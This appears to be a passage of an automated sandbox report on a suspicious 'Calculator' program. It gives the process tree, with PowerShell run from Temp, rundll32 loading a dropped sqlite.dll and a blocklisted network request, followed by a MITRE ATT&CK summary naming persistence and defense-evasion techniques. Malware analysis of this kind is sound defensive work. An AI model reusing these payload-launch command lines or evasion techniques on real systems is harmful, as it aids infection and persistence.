C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3404 /prefetch:85⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5176
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_4623.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
PID:456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4564
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6452 -ip 64521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:5008
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7096 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5956 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2228
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5956 -ip 59561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
PID:5748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 2208 -ip 22081⤵
- Executes dropped EXE
PID:5176
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:5232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
PID:2260
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:3500
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
3Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1